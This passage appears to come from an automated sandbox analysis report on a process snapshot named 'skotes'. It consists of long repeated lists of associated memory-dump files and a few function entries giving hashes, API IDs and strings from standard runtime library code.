                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                          • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                          • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                          • Opcode ID: b34934bfbb5fe86962fd8fe43aaa00fac2a345866b776578efce6466600b738b
                                                                                                                                                                                                                                          • Instruction ID: c7efd574792f08d5da63b306a89788fcb5e7c21d88dd7de520f0f2a65b3e4017
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b34934bfbb5fe86962fd8fe43aaa00fac2a345866b776578efce6466600b738b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7521C472A04205AFCB24DFA8DD56FBA77BAFF98720B11811DF91197280DF31ED008695
                                                                                                                                                                                                                                          Function 006C727C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _wcsrchr
                                                                                                                                                                                                                                          • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                          • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                          • Opcode ID: e86a1e8911ad4873e749128841ad76e8564544bd419660f2f02278a739e49c76
                                                                                                                                                                                                                                          • Instruction ID: da3b71ff8606f729845141cd3f120be22311217cd8dc8bf44e67a84a085dd7cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e86a1e8911ad4873e749128841ad76e8564544bd419660f2f02278a739e49c76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101C8277087A725661510599D03FB7179BCBC1BB4B1A402EFC58FB3C1DF54DC4265A8
                                                                                                                                                                                                                                          Function 006AFA71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 66COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 006AFB06
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                          • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 348560076-465693683
                                                                                                                                                                                                                                          • Opcode ID: 976dbef2164c2fc037ccb6a95a9b41d72a41619a231f61fa5add58a16abb4e81
                                                                                                                                                                                                                                          • Instruction ID: 9a212ccad3bc8033c097755a096add919887d1aa97b4c2ad5ca3780c85a0e85d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 976dbef2164c2fc037ccb6a95a9b41d72a41619a231f61fa5add58a16abb4e81
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32014571B423212E971073B65C8EEFB399F8E07704321143EBA05E7283EEB1CC404669
                                                                                                                                                                                                                                          Function 006C2097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • StructuredWorkStealingQueue.LIBCMT ref: 006C20B7
                                                                                                                                                                                                                                            • Part of subcall function 006BCAF3: Mailbox.LIBCMT ref: 006BCB2D
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C20C8
                                                                                                                                                                                                                                          • StructuredWorkStealingQueue.LIBCMT ref: 006C20FE
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C210F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
